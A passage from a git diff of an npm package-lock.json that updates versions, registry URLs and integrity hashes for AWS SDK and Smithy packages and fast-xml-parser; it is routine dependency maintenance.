"sha512-CY4ppZ+qHYqcXqBVi//sdHST1QK3KzOEiLtpLsc9W2k2vfZPKExGaQIsOwcyvjpjUEolotitmd3mUNY56IwDEA==", + "version": "3.972.33", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-http/-/credential-provider-http-3.972.33.tgz", + "integrity": "sha512-c0ZF+lwoWVvX5iCaGKL5T/4DnIw88CGqxA0BcBs3U86mIp5EZYPVg+KSPkMXOyokmADvNewiMUfSG2uFwjRp0g==", "license": "Apache-2.0", 
"dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/util-stream": "^4.5.21", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/util-stream": "^4.5.25", "tslib": "^2.6.2" }, "engines": { @@ -1138,24 +1230,24 @@ } }, "node_modules/@aws-sdk/credential-provider-ini": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.972.27.tgz", - "integrity": "sha512-Um26EsNSUfVUX0wUXnUA1W3wzKhVy6nviEElsh5lLZUYj9bk6DXOPnpte0gt+WHubcVfVsRk40bbm4KaroTEag==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.972.35.tgz", + "integrity": "sha512-jsU4u/cRkKFLKQS0k918FQ27fzXLG5ENiLWQMYE6581zLeI2hWh04ptlrvZMB3wJT/5d+vSzJk74X1CMFr4y8Q==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/credential-provider-env": "^3.972.24", - "@aws-sdk/credential-provider-http": "^3.972.26", - "@aws-sdk/credential-provider-login": "^3.972.27", - "@aws-sdk/credential-provider-process": "^3.972.24", - "@aws-sdk/credential-provider-sso": "^3.972.27", - "@aws-sdk/credential-provider-web-identity": "^3.972.27", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + 
"@aws-sdk/credential-provider-env": "^3.972.31", + "@aws-sdk/credential-provider-http": "^3.972.33", + "@aws-sdk/credential-provider-login": "^3.972.35", + "@aws-sdk/credential-provider-process": "^3.972.31", + "@aws-sdk/credential-provider-sso": "^3.972.35", + "@aws-sdk/credential-provider-web-identity": "^3.972.35", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1163,18 +1255,18 @@ } }, "node_modules/@aws-sdk/credential-provider-login": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-login/-/credential-provider-login-3.972.27.tgz", - "integrity": "sha512-t3ehEtHomGZwg5Gixw4fYbYtG9JBnjfAjSDabxhPEu/KLLUp0BB37/APX7MSKXQhX6ZH7pseuACFJ19NrAkNdg==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-login/-/credential-provider-login-3.972.35.tgz", + "integrity": "sha512-5oa3j0cA50jPqgNhZ9XdJVopuzUf1klRb28/2MfLYWWiPi9DRVvbrBWT+DidbHTT36520VuXZJahQwR+YgSjrg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1182,22 +1274,22 @@ } }, "node_modules/@aws-sdk/credential-provider-node": { - "version": "3.972.28", - "resolved": 
"https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.972.28.tgz", - "integrity": "sha512-rren+P6k5rShG5PX61iVi40kKdueyuMLBRTctQbyR5LooO9Ygr5L6R7ilG7RF1957NSH3KC3TU206fZuKwjSpQ==", + "version": "3.972.36", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.972.36.tgz", + "integrity": "sha512-4nT2T8Z7vH8KE9EdjEsuIlHpZSlcaK2PrKbQBjuUGU46BCCzF3WvP0u0Uiosni3Ykmmn4rWLVawoOCLotUtCbg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/credential-provider-env": "^3.972.24", - "@aws-sdk/credential-provider-http": "^3.972.26", - "@aws-sdk/credential-provider-ini": "^3.972.27", - "@aws-sdk/credential-provider-process": "^3.972.24", - "@aws-sdk/credential-provider-sso": "^3.972.27", - "@aws-sdk/credential-provider-web-identity": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/credential-provider-env": "^3.972.31", + "@aws-sdk/credential-provider-http": "^3.972.33", + "@aws-sdk/credential-provider-ini": "^3.972.35", + "@aws-sdk/credential-provider-process": "^3.972.31", + "@aws-sdk/credential-provider-sso": "^3.972.35", + "@aws-sdk/credential-provider-web-identity": "^3.972.35", + "@aws-sdk/types": "^3.973.8", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1205,16 +1297,16 @@ } }, "node_modules/@aws-sdk/credential-provider-process": { - "version": "3.972.24", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.972.24.tgz", - "integrity": "sha512-Q2k/XLrFXhEztPHqj4SLCNID3hEPdlhh1CDLBpNnM+1L8fq7P+yON9/9M1IGN/dA5W45v44ylERfXtDAlmMNmw==", + "version": "3.972.31", + "resolved": 
"https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.972.31.tgz", + "integrity": "sha512-eKeT4MXumpBJsrDLCYcSzIkFPVTFn/es7It2oogp2OhU/ic7P/+xzFpQx9ZhwtXS57Mc5S42BPWi7lHmvs/nYg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1222,18 +1314,18 @@ } }, "node_modules/@aws-sdk/credential-provider-sso": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.972.27.tgz", - "integrity": "sha512-CWXeGjlbBuHcm9appZUgXKP2zHDyTti0/+gXpSFJ2J3CnSwf1KWjicjN0qG2ozkMH6blrrzMrimeIOEYNl238Q==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.972.35.tgz", + "integrity": "sha512-bCuBdfnj0KGDMdLp6utMTLiJcFN2ek9EgZinxQZZSc3FxjJ/HSqeqab2cjbnoNfy8RM6suDCsRkmVY1izp9I+A==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/token-providers": "3.1020.0", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/token-providers": "3.1036.0", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1241,17 +1333,17 @@ } }, "node_modules/@aws-sdk/credential-provider-web-identity": { - "version": "3.972.27", - "resolved": 
"https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.972.27.tgz", - "integrity": "sha512-CUY4hQIFswdQNEsRGEzGBUKGMK5KpqmNDdu2ROMgI+45PLFS8H0y3Tm7kvM16uvvw3n1pVxk85tnRVUTgtaa1w==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.972.35.tgz", + "integrity": "sha512-swW6Bwvl8lanyEMtZOWE/oR6yqcRQH4HTQZUVsnDVgoXvRjRywpYpLv2BWwjUFyjPrqsdX6FeTkf4tMSe/qFTQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1335,14 +1427,14 @@ } }, "node_modules/@aws-sdk/middleware-host-header": { - "version": "3.972.8", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.972.8.tgz", - "integrity": "sha512-wAr2REfKsqoKQ+OkNqvOShnBoh+nkPurDKW7uAeVSu6kUECnWlSJiPvnoqxGlfousEY/v9LfS9sNc46hjSYDIQ==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.972.10.tgz", + "integrity": "sha512-IJSsIMeVQ8MMCPbuh1AbltkFhLBLXn7aejzfX5YKT/VLDHn++Dcz8886tXckE+wQssyPUhaXrJhdakO2VilRhg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1364,13 +1456,13 @@ } }, "node_modules/@aws-sdk/middleware-logger": { - "version": "3.972.8", - 
"resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.972.8.tgz", - "integrity": "sha512-CWl5UCM57WUFaFi5kB7IBY1UmOeLvNZAZ2/OZ5l20ldiJ3TiIz1pC65gYj8X0BCPWkeR1E32mpsCk1L1I4n+lA==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.972.10.tgz", + "integrity": "sha512-OOuGvvz1Dm20SjZo5oEBePFqxt5nf8AwkNDSyUHvD9/bfNASmstcYxFAHUowy4n6Io7mWUZ04JURZwSBvyQanQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1378,15 +1470,15 @@ } }, "node_modules/@aws-sdk/middleware-recursion-detection": { - "version": "3.972.9", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.972.9.tgz", - "integrity": "sha512-/Wt5+CT8dpTFQxEJ9iGy/UGrXr7p2wlIOEHvIr/YcHYByzoLjrqkYqXdJjd9UIgWjv7eqV2HnFJen93UTuwfTQ==", + "version": "3.972.11", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.972.11.tgz", + "integrity": "sha512-+zz6f79Kj9V5qFK2P+D8Ehjnw4AhphAlCAsPjUqEcInA9umtSSKMrHbSagEeOIsDNuvVrH98bjRHcyQukTrhaQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", + "@aws-sdk/types": "^3.973.8", "@aws/lambda-invoke-store": "^0.2.2", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1408,23 +1500,23 @@ } }, "node_modules/@aws-sdk/middleware-sdk-s3": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-sdk-s3/-/middleware-sdk-s3-3.972.27.tgz", - "integrity": "sha512-gomO6DZwx+1D/9mbCpcqO5tPBqYBK7DtdgjTIjZ4yvfh/S7ETwAPS0XbJgP2JD8Ycr5CwVrEkV1sFtu3ShXeOw==", + "version": "3.972.34", + "resolved": 
"https://registry.npmjs.org/@aws-sdk/middleware-sdk-s3/-/middleware-sdk-s3-3.972.34.tgz", + "integrity": "sha512-/UL96JKjsjdodcRRMKl99tLQvK6Oi9ptLC9iU1yiTF/ruaDX0mtBBtnLNZDxIZRJOCVOtB49ed1YaTadqygk8Q==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-arn-parser": "^3.972.3", - "@smithy/core": "^3.23.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/core": "^3.23.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-stream": "^4.5.21", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1447,18 +1539,18 @@ } }, "node_modules/@aws-sdk/middleware-user-agent": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.972.27.tgz", - "integrity": "sha512-TIRLO5UR2+FVUGmhYoAwVkKhcVzywEDX/5LzR9tjy1h8FQAXOtFg2IqgmwvxU7y933rkTn9rl6AdgcAUgQ1/Kg==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.972.35.tgz", + "integrity": "sha512-hOFWNOjVmOocpRlrU04nYxjMOeoe0Obu5AXEuhB8zblMCPl3cG1hdluQCZERRKFyhMQjwZnDbhSHjoMUjetFGw==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@smithy/core": "^3.23.13", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", - "@smithy/util-retry": "^4.2.12", + "@aws-sdk/core": "^3.974.5", + 
"@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@smithy/core": "^3.23.17", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/util-retry": "^4.3.4", "tslib": "^2.6.2" }, "engines": { @@ -1466,47 +1558,48 @@ } }, "node_modules/@aws-sdk/nested-clients": { - "version": "3.996.17", - "resolved": "https://registry.npmjs.org/@aws-sdk/nested-clients/-/nested-clients-3.996.17.tgz", - "integrity": "sha512-7B0HIX0tEFmOSJuWzdHZj1WhMXSryM+h66h96ZkqSncoY7J6wq61KOu4Kr57b/YnJP3J/EeQYVFulgR281h+7A==", + "version": "3.997.3", + "resolved": "https://registry.npmjs.org/@aws-sdk/nested-clients/-/nested-clients-3.997.3.tgz", + "integrity": "sha512-SivE6GP228IVgfsrr2c/vqTg95X0Qj39Yw4uIrcddpkUzIltNMoNOR62leHOLhODfjv9K8X2mPTwS69A5kT0nQ==", "license": "Apache-2.0", "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/middleware-host-header": "^3.972.8", - "@aws-sdk/middleware-logger": "^3.972.8", - "@aws-sdk/middleware-recursion-detection": "^3.972.9", - "@aws-sdk/middleware-user-agent": "^3.972.27", - "@aws-sdk/region-config-resolver": "^3.972.10", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@aws-sdk/util-user-agent-browser": "^3.972.8", - "@aws-sdk/util-user-agent-node": "^3.973.13", - "@smithy/config-resolver": "^4.4.13", - "@smithy/core": "^3.23.13", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/hash-node": "^4.2.12", - "@smithy/invalid-dependency": "^4.2.12", - "@smithy/middleware-content-length": "^4.2.12", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-retry": "^4.4.45", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + 
"@aws-sdk/core": "^3.974.5", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/signature-v4-multi-region": "^3.996.22", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", - "@smithy/util-defaults-mode-browser": "^4.3.44", - "@smithy/util-defaults-mode-node": "^4.2.48", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.12", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1515,15 +1608,15 @@ } }, "node_modules/@aws-sdk/region-config-resolver": { - "version": "3.972.10", - "resolved": "https://registry.npmjs.org/@aws-sdk/region-config-resolver/-/region-config-resolver-3.972.10.tgz", - "integrity": 
"sha512-1dq9ToC6e070QvnVhhbAs3bb5r6cQ10gTVc6cyRV5uvQe7P138TV2uG2i6+Yok4bAkVAcx5AqkTEBUvWEtBlsQ==", + "version": "3.972.13", + "resolved": "https://registry.npmjs.org/@aws-sdk/region-config-resolver/-/region-config-resolver-3.972.13.tgz", + "integrity": "sha512-CvJ2ZIjK/jVD/lbOpowBVElJyC1YxLTIJ13yM0AEo0t2v7swOzGjSA6lJGH+DwZXQhcjUjoYwc8bVYCX5MDr1A==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/config-resolver": "^4.4.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/config-resolver": "^4.4.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1531,16 +1624,16 @@ } }, "node_modules/@aws-sdk/signature-v4-multi-region": { - "version": "3.996.15", - "resolved": "https://registry.npmjs.org/@aws-sdk/signature-v4-multi-region/-/signature-v4-multi-region-3.996.15.tgz", - "integrity": "sha512-Ukw2RpqvaL96CjfH/FgfBmy/ZosHBqoHBCFsN61qGg99F33vpntIVii8aNeh65XuOja73arSduskoa4OJea9RQ==", + "version": "3.996.22", + "resolved": "https://registry.npmjs.org/@aws-sdk/signature-v4-multi-region/-/signature-v4-multi-region-3.996.22.tgz", + "integrity": "sha512-/rXhMXteD+BqhFd0nYprAgcZ/KtU+963uftPqd3tiFcFfooHZINXUGtOmo2SQjRVauCTNqIEzkwuSETdZFqTTA==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/middleware-sdk-s3": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/middleware-sdk-s3": "^3.972.34", + "@aws-sdk/types": "^3.973.8", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1548,17 +1641,17 @@ } }, "node_modules/@aws-sdk/token-providers": { - "version": "3.1020.0", - "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.1020.0.tgz", - "integrity": 
"sha512-T61KA/VKl0zVUubdxigr1ut7SEpwE1/4CIKb14JDLyTAOne2yWKtQE1dDCSHl0UqrZNwW/bTt+EBHfQbslZJdw==", + "version": "3.1036.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.1036.0.tgz", + "integrity": "sha512-aNSJ6jjDYayxN9ZA1JpycVScX93Lx03kKZ1EXt3DGOTahcWVLJj3oLAlop0xKP+vP2Ga2t49p1tEaMkTbCCaZA==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1566,12 +1659,12 @@ } }, "node_modules/@aws-sdk/types": { - "version": "3.973.6", - "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.973.6.tgz", - "integrity": "sha512-Atfcy4E++beKtwJHiDln2Nby8W/mam64opFPTiHEqgsthqeydFS1pY+OUlN1ouNOmf8ArPU/6cDS65anOP3KQw==", + "version": "3.973.8", + "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.973.8.tgz", + "integrity": "sha512-gjlAdtHMbtR9X5iIhVUvbVcy55KnznpC6bkDUWW9z915bi0ckdUr5cjf16Kp6xq0bP5HBD2xzgbL9F9Quv5vUw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1591,15 +1684,15 @@ } }, "node_modules/@aws-sdk/util-endpoints": { - "version": "3.996.5", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.996.5.tgz", - "integrity": "sha512-Uh93L5sXFNbyR5sEPMzUU8tJ++Ku97EY4udmC01nB8Zu+xfBPwpIwJ6F7snqQeq8h2pf+8SGN5/NoytfKgYPIw==", + "version": "3.996.8", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.996.8.tgz", + "integrity": 
"sha512-oOZHcRDihk5iEe5V25NVWg45b3qEA8OpHWVdU/XQh8Zj4heVPAJqWvMphQnU7LkufmUo10EpvFPZuQMiFLJK3g==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", - "@smithy/util-endpoints": "^3.3.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-endpoints": "^3.4.2", "tslib": "^2.6.2" }, "engines": { @@ -1618,27 +1711,27 @@ } }, "node_modules/@aws-sdk/util-user-agent-browser": { - "version": "3.972.8", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.972.8.tgz", - "integrity": "sha512-B3KGXJviV2u6Cdw2SDY2aDhoJkVfY/Q/Trwk2CMSkikE1Oi6gRzxhvhIfiRpHfmIsAhV4EA54TVEX8K6CbHbkA==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.972.10.tgz", + "integrity": "sha512-FAzqXvfEssGdSIz8ejatan0bOdx1qefBWKF/gWmVBXIP1HkS7v/wjjaqrAGGKvyihrXTXW00/2/1nTJtxpXz7g==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", "bowser": "^2.11.0", "tslib": "^2.6.2" } }, "node_modules/@aws-sdk/util-user-agent-node": { - "version": "3.973.13", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.973.13.tgz", - "integrity": "sha512-s1dCJ0J9WU9UPkT3FFqhKTSquYTkqWXGRaapHFyWwwJH86ZussewhNST5R5TwXVL1VSHq4aJVl9fWK+svaRVCQ==", + "version": "3.973.21", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.973.21.tgz", + "integrity": "sha512-Av4UHTcAWgdvbN0IP9pbtf4Qa1+6LtJqQdZWj5pLn5J67w0pnJJAZZ+7JPPcj2KN3378zD2JDM9DwJKEyvyMTQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/middleware-user-agent": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + 
"@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/types": "^3.973.8", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", "tslib": "^2.6.2" }, @@ -1655,39 +1748,19 @@ } }, "node_modules/@aws-sdk/xml-builder": { - "version": "3.972.16", - "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.16.tgz", - "integrity": "sha512-iu2pyvaqmeatIJLURLqx9D+4jKAdTH20ntzB6BFwjyN7V960r4jK32mx0Zf7YbtOYAbmbtQfDNuL60ONinyw7A==", + "version": "3.972.19", + "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.19.tgz", + "integrity": "sha512-Cw8IOMdBUEIl8ZlhRC3Dc/E64D5B5/8JhV6vhPLiPfJwcRC84S6F8aBOIi/N4vR9ZyA4I5Cc0Ateb/9EHaJXeQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", - "fast-xml-parser": "5.5.8", + "@smithy/types": "^4.14.1", + "fast-xml-parser": "5.7.1", "tslib": "^2.6.2" }, "engines": { "node": ">=20.0.0" } }, - "node_modules/@aws-sdk/xml-builder/node_modules/fast-xml-parser": { - "version": "5.5.8", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.8.tgz", - "integrity": "sha512-Z7Fh2nVQSb2d+poDViM063ix2ZGt9jmY1nWhPfHBOK2Hgnb/OW3P4Et3P/81SEej0J7QbWtJqxO05h8QYfK7LQ==", - "funding": 